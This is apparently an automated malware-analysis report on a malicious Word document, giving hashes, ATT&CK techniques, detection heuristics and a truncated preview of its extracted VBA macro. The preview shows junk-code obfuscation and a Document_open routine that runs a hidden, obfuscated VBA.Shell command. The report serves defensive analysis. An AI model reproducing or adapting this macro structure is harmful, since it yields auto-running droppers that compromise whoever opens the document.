Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6f4568a4eda133de…

MALICIOUS

Office (OLE)

171.0 KB Created: 2018-07-20 18:49:00 Authoring application: Microsoft Office Word First seen: 2019-01-12
MD5: f07be8862b25e39fae180a4169578c62 SHA-1: 32d7b3e3eeb00277873d353c5bc21f67d3285376 SHA-256: 6f4568a4eda133de15e10f1302dae343c8584933c91c8aaa195ef373bc0de195
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file is a Microsoft Office document containing VBA macros, specifically triggering a Document_Open macro and a critical Shell() call. This indicates the document is designed to execute arbitrary code upon opening. The presence of obfuscated VBA code suggests an attempt to hide malicious activity, likely involving the download and execution of a secondary payload.

Heuristics 5

  • ClamAV: Doc.Malware.Valyria-6794284-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6794284-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42003 bytes
SHA-256: fa8945136b7e856500fdffcfdc053d8d9f8a0ebcf05017db8a0c70eb6e9c6c4a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vUwdwkwHZAwSRz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function ocDVzYTQSvXh()
On Error Resume Next
   If FXzbRC <= 13 Then
      ElseIf diXIu > bZOOY Then
   End If
   If WzikI <= 13 Then
      ElseIf FEfYFq > vLSBq Then
   End If
   If JhpJc <= 13 Then
      ElseIf KLKjWV > LiMrrJ Then
   End If
   If zldrbG <= 13 Then
      ElseIf dwlvFS > wjvjNY Then
   End If
   If LvaPVj <= 13 Then
      ElseIf fvLvUz > OiNrwI Then
   End If
End Function
Private Function wVJSzwTVonG()
On Error Resume Next
   If GGMuUf = 2 Then
      wPuwmz = Clnih * PjEUjQ + 2346 + TSzqHl * (nYfVH * VmFqii + 90069 + kjDLsa + (BsLEi / cwvGf))
   End If
   If GfTwD = 2 Then
      mrjKNE = pLVvQ * ClEffj + 46435 + wWMYU * (hiEIB * HWpplj + 88007 + LtkZqn + (RBznR / GpVWls))
   End If
   If ApkEzF = 2 Then
      ADPXwn = jHvia * oUQpI + 97967 + ivzvQ * (LSdbc * WXCchf + 90520 + kpkbzz + (IjYvww / AFGUGa))
   End If
   If PNIMa = 2 Then
      utzdE = Gtjjvi * LjlfT + 33149 + ssqKkz * (pXXbr * rjfCOH + 43823 + GtMzb + (AZdho / zJBDpt))
   End If
   If rElQAi = 2 Then
      aKAlcp = ADcGdS * oYoNHw + 76762 + TdHCE * (ANrBjN * nUYqJ + 18167 + SMhdb + (CfzCt / FYrXda))
   End If
End Function
Private Function VMIDtXiAj()
On Error Resume Next
   If kWpBcW <= 13 Then
      ElseIf HFqAY > wKizA Then
   End If
   If uElzi <= 13 Then
      ElseIf JiVPt > mwnhic Then
   End If
   If CLHkj <= 13 Then
      ElseIf vhtVY > PbAtYB Then
   End If
   If Obozrz <= 13 Then
      ElseIf LvuJd > ikjWF Then
   End If
End Function
Private Function TdlscjhE()
On Error Resume Next
   If tpcKSn <= 13 Then
      ElseIf vXIjM > KcXuzb Then
   End If
   If iQqmF <= 13 Then
      ElseIf pAtdG > RGNfCJ Then
   End If
   If HKRpDQ <= 13 Then
      ElseIf ScJSjX > CcnEw Then
   End If
   If BzlmtO <= 13 Then
      ElseIf pWnYUf > komWw Then
   End If
   If dGWtL <= 13 Then
      ElseIf KSoAiA > UXjuz Then
   End If
End Function
Private Sub Document_open()
On Error Resume Next
   If aCYIW <= 13 Then
      ElseIf kcHaIS > iYbWX Then
   End If
   If hNKCGZ <= 13 Then
      ElseIf sivPMj > QRZPC Then
   End If
   If YsZiD <= 13 Then
      ElseIf CMFKR > DQWlb Then
   End If
VBA.Shell "" + PbSXrfi + qTHVNsWCzur + CVar("C") + LwmPNGCH + pfzijiiLO + BQiauS + zCkuMdz + dNZQB + BKiEwb + ufwLfjRkM + HIGZziIYbYd + tHCibYq + nkficCX + VcwPNkjuUv + HhmoJWLRs + XVGSqPJmTPjc + nDMjKjzuPCXctS, 0
   If QiBZb <= 13 Then
      ElseIf ilpuYK > wRPwiM Then
   End If
   If GuqEsC <= 13 Then
      ElseIf HsoQQt > bpuIdS Then
   End If
   If GrmdFD <= 13 Then
      ElseIf NVqZWJ > mECkRF Then
   End If
End Sub
Private Function qkVNKvw()
On Error Resume Next
   If PaLiK <= 13 Then
      ElseIf OiCTp > zAvov Then
   End If
   If FGzKCq <= 13 Then
      ElseIf BdAdzz > KGKlTw Then
   End If
   If jqhrkZ <= 13 Then
      ElseIf HtBVFj > iWIRvF Then
   End If
   If BXlZnY <= 13 Then
      ElseIf mvPEL > zjVoon Then
   End If
   If GBVGf <= 13 Then
      ElseIf mdHSwI > QoPlhS Then
   End If
End Function
Private Function rWjmDqGsBSG()
On Error Resume Next
   If MuajHU <= 13 Then
      ElseIf CqdURK > Wbjokz Then
   End If
   If iqflO <= 13 Then
      ElseIf jrcjT > rIKLmf Then
   End If
   If ikPDT <= 13 Then
      ElseIf SZwil > znmin Then
   End If
   If DcjbMf <= 13 Then
      ElseIf AiwwBn > moitJC Then
   End If
   If ispirf <= 13 Then
      ElseIf tFECXO > QGzwjZ Then
   End If
   If lsuzP <= 13 Then
      ElseIf zYbtL > QfGKF Then
   End If
End Function
Private Function vHcBotDZ()
On Error Resume Next
   If YtYwq <= 13 Then
      ElseIf nvLqR > ZNftX Then
   End If
   If LRZMAK <= 13 Then
      ElseIf TiqBfm > TPszh Then
   End If
   If OJsPk <= 13 Then
      ElseIf VFRVw > ozKnO Then
   End If
   If BFWJK <= 13 Then
      ElseIf jDk
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.